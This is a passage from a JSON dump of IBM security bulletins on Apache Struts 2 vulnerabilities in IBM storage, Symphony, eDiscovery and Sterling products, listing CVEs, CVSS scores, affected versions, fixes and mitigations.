\n_[_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See 
[_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>) \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n** \nAFFECTED PRODUCTS AND VERSIONS: ** \n \nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3500 \nIBM Storwize V3700 \nIBM Flex System V7000 \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.5. \n \n** \nREMEDIATION: ** \n \nFor IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.5 PTF level or higher. \n**_ \nWorkaround(s) & Mitigation(s):_** \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability. 
\n \n \n**REFERENCES: ** \n[\u00b7 __Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 __On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _ \n \n \n**RELATED INFORMATION: ** \n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**ACKNOWLEDGEMENT** \n \nNone \n \n**CHANGE HISTORY** \n17 December 2013: Updated to reference V6.4.1.7 \n16 October 2013: Original Copy Published", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T22:21:32", "type": "ibm", "title": "Security Bulletin: Unauthorized access exposure on IBM SAN Volume Controller and Storwize Family (CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2022-09-26T22:21:32", "id": "E76EDE876E613BFC954CF35B3BAEC06C0673334FEC47193E6686A3BF544CDE1D", "href": "https://www.ibm.com/support/pages/node/689363", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2023-02-21T21:53:52", "description": "## Summary\n\nSeveral security vulnerabilities have been reported against Apache Struts 2 through May 2014. IBM Platform Symphony\u2019s GUI uses Struts 2 as a framework for Java web applications. A version of the package that is vulnerable to these issues is included in several past versions of IBM Platform Symphony. The latest versions of Struts 2 address all the vulnerabilities and can be applied through the fix detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID: **[__CVE-2014-0094 __](<https://vulners.com/cve/CVE-2014-0094>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \n \nCVE-2014-0094 \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/92205_](<http://xforce.iss.net/xforce/xfdb/92205>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N) \n \n**CVEID: **[__CVE-2014-0112 __](<https://vulners.com/cve/CVE-2014-0112>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. 
\n \nCVE-ID: CVE-2014-0112 \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/92740_](<http://xforce.iss.net/xforce/xfdb/92740>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVEID: **[__CVE-2014-0113 __](<https://vulners.com/cve/CVE-2014-0113>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \n \nCVE-ID: CVE-2014-0113 \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/92742_](<http://xforce.iss.net/xforce/xfdb/92742>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVEID: **[__CVE-2014-0116 __](<https://vulners.com/cve/CVE-2014-0116>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \n \nCVE-ID: CVE-2014-0116 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/93024_](<http://xforce.iss.net/xforce/xfdb/93024>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n**Affected Products and Versions** \nIBM Platform Symphony 5.2, 6.1.x \n \n \n**Remediation/Fixes ** \n \nWe strongly recommend that you apply the following fix from FixCentral to avoid this potential security exposure. 
\n \n\n\n_Product_| _VRMF_| _Fix Number_ \n---|---|--- \nIBM Platform Symphony| _5.2, 6.1.x_| #234633 \n \n \n**Workarounds and Mitigations** \nNone \n \n**Reference** \n[](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[\u00b7 __Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 __On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _ \n \n**Related Information** \n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**Acknowledgement** \nNone \n \n**Change History** \n31 May, 2014 Original Copy Published \n \n\n\n_*_The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin._ _\n\n \n**Disclaimer** \n \nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. 
\n\n## ", "cvss3": {}, "published": "2018-06-18T01:25:07", "type": "ibm", "title": "Security Bulletin: IBM Platform Symphony (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116"], "modified": "2018-06-18T01:25:07", "id": "76FF52EA4C6CD7649F1D390FCF31D87F0192327E3F142514A23D24C630BBDD85", "href": "https://www.ibm.com/support/pages/node/679031", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-12T09:36:43", "description": "## Summary\n\nMultiple vulnerabilities in Apache Struts 2.3.x may affect IBM eDiscovery Manager. These are addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \neDiscovery Manager| 2.2.2 \n \n## Remediation/Fixes\n\nProduct\n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF008&source=SAR> \"Interim Fix 008\" ) for Windows\n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF008&source=SAR> \"Interim Fix 008\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T10:00:46", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Apache Struts Affect IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", 
"CVE-2021-31805"], "modified": "2023-07-12T10:00:46", "id": "80737D4B4CE626670083B16CA387FEFAC8045ECB16DACD55AD56FFAC544F21A4", "href": "https://www.ibm.com/support/pages/node/7011373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-29T21:26:09", "description": "## Abstract\n\nIBM Storwize V7000 Unified includes fixes for security vulnerabilities in IBM Storwize V7000. \nAdministrative access to the IBM Storwize V7000 via the IP interface may be obtained without authentication. \n\n## Content\n\n \nPlease note that the vulnerabilities below apply to the IBM Storwize V7000 GUI and do not affect the Storwize V7000 Unified GUI. \n \n**VULNERABILITY DETAILS: ** \n \n**CVEID: ** CVE-2013-4310 \n \n**DESCRIPTION: ** \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. \n \n[_CVE-2013-4310_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4310>) \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n**CVEID: ** CVE-2013-4316 \n \n**DESCRIPTION: ** \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \n_ \n_[_CVE-2013-4316_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4316>) \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87373_](<http://xforce.iss.net/xforce/xfdb/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n \n**AFFECTED PLATFORMS: **\n\n * **_Affected releases:_** IBM Storwize V7000 Unified 1.3.0.0 through 1.4.2.0. 
\n * **_Releases/systems/configurations NOT affected:_** IBM Storwize V7000 Unified 1.4.2.1 and above.\n\n**REMEDIATION: **\n\n**_ \nVendor Fix(es):_** The issues were fixed beginning with version IBM Storwize V7000 Unified 1.4.2.1. IBM Storwize V7000 Unified customers running an earlier version must upgrade to IBM Storwize V7000 Unified 1.4.2.1 or a later version in order to get these fixes. \n \n**_ \nWorkaround(s):_** None. \n \n**_ \nMitigation(s):_** Access to the Storwize V7000 management IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability.\n\n \n \n \n**REFERENCES: **\n\n * [__Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>)\n * [__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _\n \n \n**RELATED INFORMATION: **\n\n * [_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)\n * [_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>)\n \n \n**CHANGE HISTORY**\n\n * 12-12-2013: Original Copy Published\n \n \n\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" _ \n_IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n[{\"Product\":{\"code\":\"ST5Q4U\",\"label\":\"IBM Storwize V7000 Unified (2073)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"1.4\",\"Platform\":[{\"code\":\"\",\"label\":\"IBM Storwize V7000\"}],\"Version\":\"1.3;1.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {}, "published": "2022-09-26T04:23:14", "type": "ibm", "title": "Security Bulletin: IBM Storwize V7000 Unified V1.4.2.1 Includes Fixes for IBM Storwize V7000 Security Vulnerabilities (CVE-2013-4310 CVE-2013-4316)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2022-09-26T04:23:14", "id": "32DCD35C3BB7B9808D44714AAD5E5C0933C76D0D44C2BAABB1E72D83748235D2", "href": "https://www.ibm.com/support/pages/node/689373", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-22T01:47:10", "description": "## Summary\n\nSecurity Bulletin: Intelligent Clusters Security Bulletin, 1410\n\n## Vulnerability Details\n\n## Security Bulletin \n \n--- \n \nSummary \n--- \n \nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Vulnerability Details \n \n--- \n \n**CVEID:** CVE-2013-4310 CVE-2013-4316 \n**DESCRIPTION:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted 
action: prefix. \n \n[_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>) \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n**DESCRIPTION:** \n \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \n \n[_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>) \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87373_](<http://xforce.iss.net/xforce/xfdb/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions \n \n--- \n \nIBM SAN Volume Controller \nStorwize V7000 for Lenovo \nStorwize V5000 for Lenovo \nStorwize V3700 for Lenovo \nStorwize V3500 for Lenovo \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.6.\n\n## Remediation/Fixes \n \n--- \n \nFor IBM SAN Volume Controller, Storwize V7000, V5000, V3700 and V3500 for Lenovo and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.6 PTF level or higher.\n\n## Workarounds and Mitigations \n \n--- \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. 
Only users with access to the IP interface can exploit the vulnerability.\n\n## ", "cvss3": {}, "published": "2019-01-24T12:40:01", "type": "ibm", "title": "Security Bulletin: Intelligent Clusters Security Bulletin, 1410", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2019-01-24T12:40:01", "id": "4A381BCE879007EE4A86AB36C442564101BE6658BEA8959F0008297BA94F8BE4", "href": "https://www.ibm.com/support/pages/node/812734", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T10:48:12", "description": "## Summary\n\nSecurity Bulletin: IBM SAN Volume Controller and Storwize Family security vulnerabilities (CVE-2013-4310 CVE-2013-4316)\n\n## Vulnerability Details\n\n## Security Bulletin \n \n--- \n \nSummary \n--- \n \nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Vulnerability Details \n \n--- \n \n**CVEID:** CVE-2013-4310 CVE-2013-4316 \n**DESCRIPTION:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. 
\n \n[_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>) \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n**DESCRIPTION:** \n \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \n \n[_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>) \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87373_](<http://xforce.iss.net/xforce/xfdb/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions \n \n--- \n \nIBM SAN Volume Controller \nStorwize V7000 for Lenovo \nStorwize V5000 for Lenovo \nStorwize V3700 for Lenovo \nStorwize V3500 for Lenovo \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.6.\n\n## Remediation/Fixes \n \n--- \n \nFor IBM SAN Volume Controller, Storwize V7000, V5000, V3700 and V3500 for Lenovo and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.6 PTF level or higher.\n\n## Workarounds and Mitigations \n \n--- \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. 
Only users with access to the IP interface can exploit the vulnerability.\n\n## ", "cvss3": {}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: IBM SAN Volume Controller and Storwize Family security vulnerabilities (CVE-2013-4310 CVE-2013-4316)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2023-03-29T01:48:02", "id": "B4FD409846BC477F7E2953E4C8F960515DC4E0D5564EB720E28E817DE28FA2C0", "href": "https://www.ibm.com/support/pages/node/866010", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T13:50:53", "description": "## Summary\n\nIBM Sterling Order Management, IBM Sterling Configure Price Quote and Sterling Web Channel use Apache Struts 2 and are affected by some of the vulnerabilities that exist in Apache Struts 2. \nThis bulletin now also covers a vulnerability related to the Apache Commons FileUpload version included with Apache Struts 2.\n\n## Vulnerability Details\n\n * **CVEID:** [_CVE-2014-0112_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0112>) \n \n**Description:** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. 
\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92740> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n * **CVEID:** [_CVE-2014-0113_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0113>) \n \n**Description:** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92742> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n * **CVEID:** [_CVE-2014-0094_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0094>) \n \n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \n \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92205> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n * **CVEID:** [_CVE-2014-0050_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050>) \n \n**Description:** \nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. 
